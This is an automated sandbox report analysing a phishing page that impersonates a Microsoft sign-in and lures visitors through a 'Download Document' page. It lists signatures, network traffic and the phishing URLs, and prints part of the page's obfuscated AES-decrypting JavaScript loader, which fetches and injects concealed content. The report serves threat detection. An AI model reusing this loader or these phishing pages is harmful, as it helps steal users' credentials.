Edit tour

Windows Analysis Report
https://colegiojuancalvino.com/cloud/

Overview

General Information

Sample URL:https://colegiojuancalvino.com/cloud/
Analysis ID:1675103
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Yara detected HtmlPhish10
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 1320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6988 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1964,i,7820921529395472198,438887619423498183,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://colegiojuancalvino.com/cloud/" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
1.15.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://microcmg.jp-osa-1.linodeobjects.com/favicon.icoAvira URL Cloud: Label: phishing

    Phishing

    barindex
    Source: https://microcmg.jp-osa-1.linodeobjects.com/opas/opas.html?e=sample@domain.comJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'microcmg.jp-osa-1.linodeobjects.com' does not match the legitimate domain 'microsoft.com'., The URL contains 'linodeobjects.com', which is a cloud service provider, and 'microcmg' which is suspiciously similar to 'Microsoft'., The presence of 'jp-osa-1' and the use of a cloud service provider's domain suggest this could be a phishing attempt., The URL structure includes hyphens and subdomains that do not align with Microsoft's typical domain structure. DOM: 1.15.pages.csv
    Source: Yara matchFile source: 1.15.pages.csv, type: HTML
    Source: https://colegiojuancalvino.com/cloud/Joe Sandbox AI: Page contains button: 'Download Document' Source: '0.11.pages.csv'
    Source: https://colegiojuancalvino.com/cloud/Joe Sandbox AI: Page contains button: 'Download Document' Source: '0.12.pages.csv'
    Source: 1.20..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://microcmg.jp-osa-1.linodeobjects.com/opas/o... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script appears to be decrypting and executing malicious content, potentially compromising the user's system. The overall behavior is highly suspicious and indicative of a malicious script.
    Source: https://colegiojuancalvino.com/cloud/HTTP Parser: Number of links: 0
    Source: https://microcmg.jp-osa-1.linodeobjects.com/opas/opas.html?e=sample@domain.comHTTP Parser: Number of links: 0
    Source: https://microcmg.jp-osa-1.linodeobjects.com/opas/opas.html?e=sample@domain.comHTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://microcmg.jp-osa-1.linodeobjects.com/opas/opas.html?e=sample@domain.comHTTP Parser: Base64 decoded: function desistance(schticks) { var { a, b, c, d } = JSON.parse(schticks); var uplighting = CryptoJS.PBKDF2(d, CryptoJS.enc.Utf8.parse(b), { hasher: CryptoJS.algo.SHA512, keySize: (32 + 16) / 4, iterations: 999 }); ...
    Source: https://colegiojuancalvino.com/cloud/HTTP Parser: Title: colegiojuancalvino.com does not match URL
    Source: https://microcmg.jp-osa-1.linodeobjects.com/opas/opas.html?e=sample@domain.comHTTP Parser: Title: Sign in to your account does not match URL
    Source: https://colegiojuancalvino.com/cloud/HTTP Parser: Invalid link: terms and conditions
    Source: https://colegiojuancalvino.com/cloud/HTTP Parser: Invalid link: terms and conditions
    Source: https://microcmg.jp-osa-1.linodeobjects.com/opas/opas.html?e=sample@domain.comHTTP Parser: Invalid link: Privacy statement
    Source: https://microcmg.jp-osa-1.linodeobjects.com/opas/opas.html?e=sample@domain.comHTTP Parser: (function anonymous() {function desistance(schticks) { var { a, b, c, d } = json.parse(schticks); var uplighting = cryptojs.pbkdf2(d, cryptojs.enc.utf8.parse(b), { hasher: cryptojs.algo.sha512, keysize: (32 + 16) / 4, iterations: 999 }); const pyruvates = cryptojs.lib.wordarray.create(uplighting.words.slice(0, 8)); const stablishments = cryptojs.lib.wordarray.create(uplighting.words.slice(8, 12)); let orchitic = cryptojs.aes.decrypt(a, pyruvates, { iv: stablishments }); return cryptojs.enc.utf8.stringify(orchitic);}(async () => { document.open();/*ham nostrud jowl corned beef, pork belly spare ribs irure deserunt consectetur short ribs capicola. */ document. /*$kalimat2*/ write(desistance( /* schticks *//*dolore sirloin aute, pork loin exercitation shank fatback. */ await ( /*t-bone in venison consequat shoulder. */await fetch(desistance(atob(`eyjhijoiwnc5qwv0ni9ov0xsohh4wxexnhpmddnhekl6t1iyd2mwotb3dkr3rm5eajfzzhbp...
    Source: https://microcmg.jp-osa-1.linodeobjects.com/opas/opas.html?e=sample@domain.comHTTP Parser: <input type="password" .../> found
    Source: https://colegiojuancalvino.com/cloud/HTTP Parser: No favicon
    Source: https://colegiojuancalvino.com/cloud/HTTP Parser: No favicon
    Source: https://colegiojuancalvino.com/cloud/HTTP Parser: No favicon
    Source: https://colegiojuancalvino.com/cloud/HTTP Parser: No favicon
    Source: https://colegiojuancalvino.com/cloud/HTTP Parser: No favicon
    Source: https://colegiojuancalvino.com/cloud/HTTP Parser: No favicon
    Source: https://colegiojuancalvino.com/cloud/HTTP Parser: No favicon
    Source: https://colegiojuancalvino.com/cloud/HTTP Parser: No favicon
    Source: https://colegiojuancalvino.com/cloud/HTTP Parser: No favicon
    Source: https://colegiojuancalvino.com/cloud/HTTP Parser: No favicon
    Source: https://colegiojuancalvino.com/cloud/HTTP Parser: No favicon
    Source: https://microcmg.jp-osa-1.linodeobjects.com/opas/opas.html?e=sample@domain.comHTTP Parser: No favicon
    Source: https://microcmg.jp-osa-1.linodeobjects.com/opas/opas.html?e=sample@domain.comHTTP Parser: No favicon
    Source: https://microcmg.jp-osa-1.linodeobjects.com/opas/opas.html?e=sample@domain.comHTTP Parser: No favicon
    Source: https://colegiojuancalvino.com/cloud/HTTP Parser: No <meta name="author".. found
    Source: https://microcmg.jp-osa-1.linodeobjects.com/opas/opas.html?e=sample@domain.comHTTP Parser: No <meta name="author".. found
    Source: https://colegiojuancalvino.com/cloud/HTTP Parser: No <meta name="copyright".. found
    Source: https://microcmg.jp-osa-1.linodeobjects.com/opas/opas.html?e=sample@domain.comHTTP Parser: No <meta name="copyright".. found
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
    Source: unknownHTTPS traffic detected: 198.23.60.214:443 -> 192.168.2.17:49718 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 198.23.60.214:443 -> 192.168.2.17:49719 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 198.23.60.214:443 -> 192.168.2.17:49721 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.17:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.72.132:443 -> 192.168.2.17:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.188.228:443 -> 192.168.2.17:49734 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.69.4:443 -> 192.168.2.17:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.72.164:443 -> 192.168.2.17:49753 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.72.132:443 -> 192.168.2.17:49767 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.17:49774 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 198.23.60.214:443 -> 192.168.2.17:49775 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.17:49782 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.71:443 -> 192.168.2.17:49790 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.234.86.83:443 -> 192.168.2.17:49826 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.234.86.83:443 -> 192.168.2.17:49825 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.17:49837 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.17:49843 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.71:443 -> 192.168.2.17:49845 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.17:49849 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.17:49851 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.17:49853 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.17:49856 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.17:49854 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.6.156:443 -> 192.168.2.17:49863 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 43.129.45.113:443 -> 192.168.2.17:49860 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.6.156:443 -> 192.168.2.17:49872 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.151.6:443 -> 192.168.2.17:49878 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.17:49884 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.17:49920 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.15.240.19:443 -> 192.168.2.17:49942 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.1.237.105:443 -> 192.168.2.17:49952 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.1.237.105:443 -> 192.168.2.17:49952 version: TLS 1.2
    Source: chrome.exeMemory has grown: Private usage: 1MB later: 37MB
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
    Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
    Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
    Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
    Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
    Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
    Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
    Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
    Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
    Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
    Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
    Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
    Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.71
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.71
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.71
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.71
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.71
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.71
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.71
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.71
    Source: global trafficHTTP traffic detected: GET /cloud/ HTTP/1.1Host: colegiojuancalvino.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cloud/img/index.css HTTP/1.1Host: colegiojuancalvino.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://colegiojuancalvino.com/cloud/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cloud/img/styles.css HTTP/1.1Host: colegiojuancalvino.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://colegiojuancalvino.com/cloud/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cloud/js/captcha.js?cb=1745693885 HTTP/1.1Host: colegiojuancalvino.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://colegiojuancalvino.com/cloud/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cloud/js/27t732321122.js HTTP/1.1Host: colegiojuancalvino.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://colegiojuancalvino.com/cloud/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://colegiojuancalvino.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CLf3ygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://colegiojuancalvino.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/44e6f86df4dc/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://colegiojuancalvino.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/anchor?ar=1&k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33y&co=aHR0cHM6Ly9jb2xlZ2lvanVhbmNhbHZpbm8uY29tOjQ0Mw..&hl=en&v=ItfkQiGBlJDHuTkOhlT3zHpB&size=normal&cb=r86mefsrfvm2 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLf3ygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://colegiojuancalvino.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=ItfkQiGBlJDHuTkOhlT3zHpB HTTP/1.1Host: www.google.comConnection: keep-aliveAccept: */*X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLf3ygE=Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerSec-Fetch-Storage-Access: activeReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33y&co=aHR0cHM6Ly9jb2xlZ2lvanVhbmNhbHZpbm8uY29tOjQ0Mw..&hl=en&v=ItfkQiGBlJDHuTkOhlT3zHpB&size=normal&cb=r86mefsrfvm2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/bframe?hl=en&v=ItfkQiGBlJDHuTkOhlT3zHpB&k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLf3ygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://colegiojuancalvino.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: colegiojuancalvino.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://colegiojuancalvino.com/cloud/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA6URnwJUfsZxTj2ctYJaYM1sbGnxKFnkb8EmeoweNRzDFX9_0SbXeMDtj8fH3-bzrtpNPWQdd1QJwxg4Ji6QwJZdZIKlTTbLRv7PrmTQ9FCqr5Dqdr692tOiH_8mg2OFKXQWg8_BrqX5FVQ7TmsV9jyoBM8pUW2cvH7jfHxwTkT7KFo8O0l5g3797GkTuJq70ZLuGdAflKy87M2x0i_PsmWZPtUcw&k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CLf3ygE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=ItfkQiGBlJDHuTkOhlT3zHpB&k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33yAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AMNxLB_posGEm9dxgeZ2_RkIF9tdHhTyg6o7Oc7Urs0DpmK2AotbgsHcB0zhaH_X7jfLPNnxtceeNe1nlltqLoU
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/reload?k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLf3ygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AMNxLB_posGEm9dxgeZ2_RkIF9tdHhTyg6o7Oc7Urs0DpmK2AotbgsHcB0zhaH_X7jfLPNnxtceeNe1nlltqLoU
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA6URnwJUfsZxTj2ctYJaYM1sbGnxKFnkb8EmeoweNRzDFX9_0SbXeMDtj8fH3-bzrtpNPWQdd1QJwxg4Ji6QwJZdZIKlTTbLRv7PrmTQ9FCqr5Dqdr692tOiH_8mg2OFKXQWg8_BrqX5FVQ7TmsV9jyoBM8pUW2cvH7jfHxwTkT7KFo8O0l5g3797GkTuJq70ZLuGdAflKy87M2x0i_PsmWZPtUcw&k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLf3ygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AMNxLB_posGEm9dxgeZ2_RkIF9tdHhTyg6o7Oc7Urs0DpmK2AotbgsHcB0zhaH_X7jfLPNnxtceeNe1nlltqLoU
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/userverify?k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLf3ygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AMNxLB_posGEm9dxgeZ2_RkIF9tdHhTyg6o7Oc7Urs0DpmK2AotbgsHcB0zhaH_X7jfLPNnxtceeNe1nlltqLoU
